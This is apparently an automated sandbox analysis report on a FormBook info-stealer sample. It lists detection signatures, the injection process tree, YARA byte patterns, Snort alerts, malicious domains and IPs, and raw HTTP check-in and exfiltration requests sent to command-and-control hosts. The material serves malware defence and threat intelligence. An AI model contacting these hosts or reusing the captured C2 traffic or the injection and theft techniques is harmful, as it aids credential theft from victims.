Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:794399
MD5:02df8c86345d056735fa60116b93ed2b
SHA1:70294e9e09c8d9d895599b73d1091c4013aee691
SHA256:c7627adc0797d3315c2c942356c8cb1fca39afbd0335512236be79a6e2f7acb3
Tags:NETexeMSIL
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Writes to foreign memory regions
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
.NET source code contains method to dynamically call methods (often used by packers)
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 1268 cmdline: C:\Users\user\Desktop\file.exe MD5: 02DF8C86345D056735FA60116B93ED2B)
    • CasPol.exe (PID: 5336 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe MD5: F866FC1C2E928779C7119353C3091F0C)
    • CasPol.exe (PID: 5312 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe MD5: F866FC1C2E928779C7119353C3091F0C)
      • explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msiexec.exe (PID: 1972 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.511832982.0000000000860000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.511832982.0000000000860000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x1f010:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xae3f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x18237:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000004.00000002.511832982.0000000000860000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x18035:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x17ad1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x18137:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x182af:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xaa0a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x16d1c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1ddb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ed6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000004.00000002.511979263.0000000000890000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.511979263.0000000000890000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x1f010:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xae3f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x18237:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      Click to see the 10 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.CasPol.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        2.2.CasPol.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x20e43:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xcc72:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x1a06a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        2.2.CasPol.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x19e68:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x19904:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x19f6a:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1a0e2:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xc83d:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x18b4f:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x1fbea:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x20b9d:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.CasPol.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.CasPol.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x20043:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xbe72:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x1926a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          Click to see the 1 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.6184.94.215.9149729802031449 01/30/23-14:52:54.016726
          SID:2031449
          Source Port:49729
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.6184.94.215.9149729802031453 01/30/23-14:52:54.016726
          SID:2031453
          Source Port:49729
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.6184.94.215.9149729802031412 01/30/23-14:52:54.016726
          SID:2031412
          Source Port:49729
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: file.exeReversingLabs: Detection: 61%
          Source: file.exeVirustotal: Detection: 51%Perma Link
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.511832982.0000000000860000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.511979263.0000000000890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.285119335.0000000000F10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Antivirus / Scanner detection for submitted sample
          Source: file.exeAvira: detected
          Antivirus detection for URL or domain
          Source: https://www.n-r-eng.com/crhz/?ghJ5T=O29nP3ATS/5Z6K6ZOqFFpve/mTBG7paw5Avira URL Cloud: Label: malware
          Source: http://www.hvlandscapes.biz/crhz/Avira URL Cloud: Label: malware
          Source: http://www.frogair.onlineAvira URL Cloud: Label: malware
          Source: http://www.laylaroseuk.comAvira URL Cloud: Label: malware
          Source: http://www.mitsubangsaen.onlineAvira URL Cloud: Label: malware
          Source: http://www.mitsubangsaen.online/crhz/Avira URL Cloud: Label: malware
          Source: http://www.teammart.onlineAvira URL Cloud: Label: malware
          Source: http://www.n-r-eng.com/crhz/Avira URL Cloud: Label: malware
          Source: http://www.hayuterce.comAvira URL Cloud: Label: malware
          Source: http://www.n-r-eng.comAvira URL Cloud: Label: malware
          Source: http://www.hayuterce.com/crhz/Avira URL Cloud: Label: malware
          Source: http://www.teammart.online/crhz/Avira URL Cloud: Label: malware
          Source: http://www.sandpiper-apts.com/crhz/Avira URL Cloud: Label: malware
          Source: http://www.frogair.online/crhz/Avira URL Cloud: Label: malware
          Source: http://www.suachuadienlanh247.com/crhz/Avira URL Cloud: Label: malware
          Source: http://www.laylaroseuk.com/crhz/Avira URL Cloud: Label: malware
          Machine Learning detection for sample
          Source: file.exeJoe Sandbox ML: detected
          Source: 2.2.CasPol.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: msiexec.pdb source: CasPol.exe, 00000002.00000002.285603663.0000000001390000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: msiexec.pdbGCTL source: CasPol.exe, 00000002.00000002.285603663.0000000001390000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: caspol.pdbdv source: explorer.exe, 00000003.00000002.529615477.0000000014033000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.515930309.0000000004833000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: HBhG.pdbHw^w Pw_CorExeMainmscoree.dll source: file.exe
          Source: Binary string: wntdll.pdbUGP source: CasPol.exe, 00000002.00000003.249624955.0000000001238000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, CasPol.exe, 00000002.00000003.247629652.0000000001093000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.513198532.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.287312928.0000000004359000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.284760450.00000000041C2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.513198532.000000000460F000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: caspol.pdb source: explorer.exe, 00000003.00000002.529615477.0000000014033000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.515930309.0000000004833000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: CasPol.exe, CasPol.exe, 00000002.00000003.249624955.0000000001238000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, CasPol.exe, 00000002.00000003.247629652.0000000001093000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, msiexec.exe, 00000004.00000002.513198532.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.287312928.0000000004359000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.284760450.00000000041C2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.513198532.000000000460F000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: HBhG.pdb source: file.exe
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_006331A0 FindFirstFileW,FindNextFileW,FindClose,4_2_006331A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then pop edi4_2_00628D80
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then pop edi4_2_00628D7F

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.tf8dangky.online
          Source: C:\Windows\explorer.exeNetwork Connect: 76.223.105.230 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 164.88.201.214 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.sandpiper-apts.com
          Source: C:\Windows\explorer.exeDomain query: www.frogair.online
          Source: C:\Windows\explorer.exeNetwork Connect: 163.44.198.50 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.hvlandscapes.biz
          Source: C:\Windows\explorer.exeNetwork Connect: 184.94.215.91 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 185.151.199.52 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 18.138.206.213 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 81.169.145.72 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.n-r-eng.com
          Source: C:\Windows\explorer.exeDomain query: www.teammart.online
          Source: C:\Windows\explorer.exeDomain query: www.laylaroseuk.com
          Source: C:\Windows\explorer.exeNetwork Connect: 103.221.223.104 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.mitsubangsaen.online
          Source: C:\Windows\explorer.exeDomain query: www.suachuadienlanh247.com
          Source: C:\Windows\explorer.exeNetwork Connect: 2.57.90.16 80Jump to behavior
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49729 -> 184.94.215.91:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49729 -> 184.94.215.91:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49729 -> 184.94.215.91:80
          Source: Joe Sandbox ViewASN Name: PARTNER-ASIL PARTNER-ASIL
          Source: global trafficHTTP traffic detected: GET /crhz/?90Z5=-8rTZKCzAmXPlO&ghJ5T=1rNCCz7kTcLTieqVkhzplJgcoI94HvPGoNH0lVnmkmFXwmlt9jZmgzPB/kdX+WOK+rGt5Wg7VkzKMCVbaV5wfyZJWCK5Z18H2VF/y4/Kognk HTTP/1.1Host: www.laylaroseuk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?ghJ5T=O29nP3ATS/5Z6K6ZOqFFpve/mTBG7paw5+pol+lVZCotPeZJEV3KnsQwBw1FpEdPbpeQCJZSqBlkKVIQIQyw8OwcFAej9bBQBYULGapVGCZ8&90Z5=-8rTZKCzAmXPlO HTTP/1.1Host: www.n-r-eng.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?90Z5=-8rTZKCzAmXPlO&ghJ5T=LNHYCELR2jrkl6ex9ablCycu9h3K7h+sZB96ERWJZAieoidRiLebg6j0RcHsFDDJ9r29OHFtYH9IplqsElTHfTI2iz39I/8+/5l0mHu4niU0 HTTP/1.1Host: www.sandpiper-apts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?ghJ5T=4blG9eK7alfY4URLGxkOib9O4UWCECbcMJ2fHD64T+pOqyJeQKS/uT906cjCl4jdAQhvn7mHg7wgiqcNtMEnJIHJg+N9005boEqGm8iwl7o0&90Z5=-8rTZKCzAmXPlO HTTP/1.1Host: www.tf8dangky.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?90Z5=-8rTZKCzAmXPlO&ghJ5T=4Z6KAxgBWslvyWQs2zz1LTCSIJZnXz/Wr59nnN1quAvIIyJUwPyWYoHYYm82bfT5dpIzg2ZgrTpqnEgpaKo3IMTbbHn1kxCLU7tvpznsmq41 HTTP/1.1Host: www.teammart.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?ghJ5T=CCCEekJcxP1BHV4uutXMBlMorQncoYcW7RlEC0I+F0KDkaobIF+zubJ5fpyHcR0fDKGG4SO4PI1fmloML0V8WxzpJC6D/H2QJAQp0zm+InHs&90Z5=-8rTZKCzAmXPlO HTTP/1.1Host: www.suachuadienlanh247.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?90Z5=-8rTZKCzAmXPlO&ghJ5T=tmPv/9YflmeFyaovhpy86TX5rNY2iNLCfFTw46C4YL4FjsvtgGKrRmf5O7NIQw/qRR8QJqKEWoluew4y5+XfIT1Onmlscs+4wa7bdRvmZkTM HTTP/1.1Host: www.hvlandscapes.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?ghJ5T=iycDOFv4tLFlCihz1M/bkpzttTI3wOwIoAcOv31GIYKsRKZ8f8EzkP6Z56SPUyztaOnMa+iauXtsUeY/SnJCIVqiEyUfq8kF6FnqNv3PiNZk&90Z5=-8rTZKCzAmXPlO HTTP/1.1Host: www.frogair.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?90Z5=-8rTZKCzAmXPlO&ghJ5T=nqmZBp2BkKhv5XD7JtliHBtb5J/nACgDXsCawcooXFLLWI2M3W+/ErAqTridlmxSnsXQQ5N94lpVUeLYPOpWHcmhsJP5m/P/TeGXz1gc+4vL HTTP/1.1Host: www.mitsubangsaen.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 18.138.206.213 18.138.206.213
          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.n-r-eng.comConnection: closeContent-Length: 191Cache-Control: no-cacheOrigin: http://www.n-r-eng.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.n-r-eng.com/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 67 68 4a 35 54 3d 44 30 56 48 4d 42 42 4d 49 71 41 79 7a 4a 7e 67 54 63 42 5a 72 74 71 51 71 69 6c 78 30 71 32 37 34 4f 41 5a 70 71 68 55 41 6c 45 6c 4c 75 42 39 45 6c 43 64 67 4b 64 69 48 48 68 68 6e 6b 45 4f 56 61 71 65 4b 75 4e 59 71 48 42 5a 52 46 38 72 48 33 6d 79 7a 2d 41 30 47 52 75 67 38 4b 46 32 59 5a 38 4b 42 36 73 33 42 31 51 4a 46 41 7a 79 35 36 58 2d 77 4e 67 31 74 4f 73 50 6b 39 43 39 75 53 6d 58 73 70 6b 36 49 77 6c 73 5a 52 42 47 4c 45 4a 42 75 75 49 31 79 5a 46 37 44 46 54 4d 46 6f 4a 77 48 4d 47 54 56 6c 75 4d 74 5a 41 5f 57 43 6a 47 57 4d 6b 2e 00 00 00 00 00 00 00 00 Data Ascii: ghJ5T=D0VHMBBMIqAyzJ~gTcBZrtqQqilx0q274OAZpqhUAlElLuB9ElCdgKdiHHhhnkEOVaqeKuNYqHBZRF8rH3myz-A0GRug8KF2YZ8KB6s3B1QJFAzy56X-wNg1tOsPk9C9uSmXspk6IwlsZRBGLEJBuuI1yZF7DFTMFoJwHMGTVluMtZA_WCjGWMk.
          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.n-r-eng.comConnection: closeContent-Length: 1455Cache-Control: no-cacheOrigin: http://www.n-r-eng.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.n-r-eng.com/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 67 68 4a 35 54 3d 44 30 56 48 4d 42 42 4d 49 71 41 79 79 70 75 67 52 37 39 5a 6a 74 71 54 76 69 6c 78 36 36 32 5f 34 4f 45 5a 70 76 4e 45 41 58 49 6c 46 64 70 39 46 41 32 64 7a 36 64 69 42 48 68 6c 70 45 46 48 56 63 47 6b 4b 73 55 74 71 42 5a 5a 65 46 4d 72 42 31 65 39 34 75 41 79 43 52 75 6a 38 4b 46 5a 59 59 4d 57 42 36 70 53 42 31 49 4a 45 32 76 79 28 4b 58 5f 28 74 67 31 74 4f 73 44 6b 39 43 52 75 53 28 45 73 6f 4d 51 4c 42 31 73 58 55 4e 47 4a 6e 68 47 6f 75 4a 38 39 4a 45 74 51 42 4c 4a 50 70 38 32 50 4a 66 78 47 30 36 6f 6f 61 74 58 53 69 62 61 4b 73 55 63 30 4f 55 56 4a 45 6d 72 36 69 7e 6f 77 52 39 49 55 6c 6b 69 36 62 50 70 76 53 51 47 5a 39 68 39 4a 50 6a 79 66 4a 39 6d 56 39 66 59 63 49 42 6b 6f 44 75 65 7a 6f 5a 59 35 62 70 47 52 73 55 57 78 37 4d 74 69 39 4d 4e 61 44 72 4b 57 32 76 43 48 32 69 4f 4e 37 4c 47 32 51 52 50 4f 56 51 62 30 78 34 33 61 48 76 59 36 47 4b 6c 43 5a 55 56 6c 68 79 6b 7e 78 7e 6f 38 48 33 32 4f 68 6d 34 54 30 4a 4b 70 6b 77 5a 58 43 6e 49 48 44 77 61 7a 6b 72 7a 6a 4e 4d 75 62 4a 51 32 67 32 31 72 6f 6a 71 77 62 47 4e 75 7a 72 45 5f 57 37 35 66 6f 76 47 67 36 75 56 65 5a 56 55 34 48 42 44 35 51 69 67 6d 44 76 45 5a 36 39 55 47 73 42 41 36 50 67 66 58 6b 7a 64 51 6b 6d 48 48 76 57 64 44 56 59 6f 70 28 6a 70 55 5a 62 71 61 78 37 62 77 4e 43 72 55 53 36 65 38 7e 6a 52 6c 47 69 72 78 30 49 4f 55 78 6c 4b 41 57 41 31 58 4b 72 44 6e 4b 61 7e 4b 71 54 52 4d 33 78 6c 38 7e 6a 61 6a 78 53 76 5f 46 77 74 35 73 7a 4a 46 6b 75 65 6c 71 6a 67 4b 43 41 4b 53 4f 30 7a 35 55 79 4d 2d 74 74 74 32 43 73 32 4d 68 66 38 6e 65 76 67 43 4e 44 74 33 39 35 78 77 77 73 6d 6d 6e 52 74 30 77 71 4b 37 55 6d 4d 6d 45 55 6f 59 46 43 67 6b 57 51 73 71 41 38 69 4d 66 72 4a 63 31 54 68 2d 31 45 63 61 7a 4e 46 58 55 45 56 5f 58 75 4b 4b 45 6d 39 63 30 4b 75 39 44 69 74 44 44 71 45 43 47 71 30 4d 4d 41 75 44 7e 69 28 75 32 76 44 47 39 4e 33 5a 5a 6a 6f 61 58 67 54 59 66 6d 76 70 42 35 76 4f 55 48 6f 4b 4f 33 45 44 7a 72 4d 38 34 61 36 34 48 76 78 62 73 61 53 76 68 67 59 7a 5a 32 50 4e 57 30 56 6a 4c 51 63 37 47 58 51 42 48 7a 4e 6f 52 51 7e 53 56 73 33 5a 5a 78 6a 52 35 46 57 75 56 32 39 5a 4b 46 56 44 67 56 77 4b 53 67 42 55 30 4b 7e 47 68 73 4b 79 7a 34 6e 59 78 49 55 33 75 4a 59 5a 59 5a 61 43 55 7a 4c 4a 6c 42 6d 4c 46 4f 6f 56 39 39 46 66 68 4c 52 78 4e 76 31 42 62 77 41 4c 4c 57 46 6d 57 71 51 49 56 55 65 6a 33 54 45 30 74 41 42 6b 34 6f 65 79 77 77 42 63 65 54 52 43 4f 79 63 52 6c 46 72 56 6e 78 79 71 33 55 71 58 56 66 4b 79 50 42 4a 78 73 5a 72 61 4f 45 54 61 32 61 68 59 61 75 74 50 43 32 58 4d 34 68 47 50 44 6b 31 52 72 73 39 36 46 72 44 57 45 4
          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.sandpiper-apts.comConnection: closeContent-Length: 191Cache-Control: no-cacheOrigin: http://www.sandpiper-apts.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.sandpiper-apts.com/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 67 68 4a 35 54 3d 47 50 76 34 42 78 75 39 6b 78 61 45 69 49 75 4b 72 4a 37 72 63 31 41 72 28 79 4c 57 33 54 36 4e 42 30 55 46 43 52 53 30 50 6e 65 57 67 77 74 78 74 63 43 62 67 35 33 30 5a 5a 62 49 4b 48 69 6a 71 5a 76 30 54 79 52 35 51 55 67 2d 77 56 71 54 50 42 50 78 59 79 49 66 6c 45 75 6e 4a 4d 64 49 72 5a 6c 78 68 31 4b 54 6d 58 46 69 5a 55 48 76 4b 6f 67 63 70 6b 55 54 28 48 71 53 52 6b 70 6b 50 4e 58 57 6c 4c 66 39 70 47 4c 6c 30 42 59 32 72 5a 69 69 41 61 39 34 66 6b 57 50 62 61 53 4b 39 78 6a 55 44 70 39 77 75 2d 41 68 71 75 68 6e 30 37 61 4f 37 64 41 2e 00 00 00 00 00 00 00 00 Data Ascii: ghJ5T=GPv4Bxu9kxaEiIuKrJ7rc1Ar(yLW3T6NB0UFCRS0PneWgwtxtcCbg530ZZbIKHijqZv0TyR5QUg-wVqTPBPxYyIflEunJMdIrZlxh1KTmXFiZUHvKogcpkUT(HqSRkpkPNXWlLf9pGLl0BY2rZiiAa94fkWPbaSK9xjUDp9wu-Ahquhn07aO7dA.
          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.sandpiper-apts.comConnection: closeContent-Length: 1455Cache-Control: no-cacheOrigin: http://www.sandpiper-apts.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.sandpiper-apts.com/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 67 68 4a 35 54 3d 47 50 76 34 42 78 75 39 6b 78 61 45 6a 70 65 4b 71 71 54 72 4c 46 41 30 6d 79 4c 57 7e 7a 36 4a 42 30 6f 46 43 55 7a 76 50 56 53 57 67 6e 78 78 74 2d 71 62 69 35 33 30 4f 4a 62 4d 46 6e 69 70 71 5a 71 4e 54 33 74 50 51 57 4d 2d 32 30 36 54 4a 44 58 32 58 69 49 64 68 45 75 6d 4a 4d 63 53 72 5a 30 32 68 32 6d 35 6d 58 4e 69 5a 69 72 76 43 34 67 54 6d 45 55 54 28 48 71 4f 52 6b 6f 39 50 4e 66 4f 6c 50 54 55 70 31 6a 6c 33 6c 41 32 74 36 4b 74 4a 36 39 30 63 6b 58 7a 61 5f 4f 42 6c 42 76 51 56 35 4a 31 7e 4e 30 7a 6d 66 4d 35 6f 71 53 4a 28 59 59 6f 5a 50 75 54 46 70 66 43 77 75 67 62 43 34 70 6c 42 59 39 57 54 69 6a 6e 31 75 4b 53 64 52 47 75 55 77 54 6d 59 76 66 65 44 5f 4a 59 33 4b 51 5a 4a 33 66 4e 43 6d 75 2d 6a 59 4b 43 66 2d 52 78 52 36 53 50 64 4a 34 55 45 34 47 6a 53 30 62 68 63 58 41 6a 54 46 47 57 53 67 4a 4f 4b 76 50 36 41 50 41 59 4e 2d 57 6f 78 4d 79 69 61 74 4e 76 56 42 58 62 49 6f 72 5a 75 68 77 44 56 30 7a 4a 71 54 35 69 69 45 35 66 6d 33 6c 6f 33 49 7a 4e 50 41 32 6d 68 32 67 70 4a 69 43 65 31 4e 41 49 74 59 47 62 47 42 56 38 75 2d 53 69 57 6e 51 4f 33 79 54 6c 46 79 72 51 7a 57 61 48 67 45 6c 5a 6e 42 4c 79 69 78 46 4a 42 69 34 78 31 41 36 72 51 55 63 6a 46 7a 70 62 39 42 51 4c 44 70 57 6e 47 47 36 2d 79 4d 69 7a 64 36 70 6f 50 64 78 59 51 67 6a 44 43 63 68 39 42 6e 32 70 59 44 59 6e 28 6d 34 6c 76 39 37 74 61 5f 36 66 42 39 75 55 31 6e 73 4d 72 39 38 42 4d 44 47 69 6b 72 47 35 7a 38 38 64 6c 5a 34 48 76 75 64 44 4a 53 37 36 70 37 79 62 52 52 71 44 44 76 4d 59 58 71 32 5f 67 73 55 59 57 33 63 67 33 71 49 70 62 65 65 58 64 42 65 44 28 54 45 73 35 6f 4c 4a 75 7a 47 68 5a 74 49 70 71 67 49 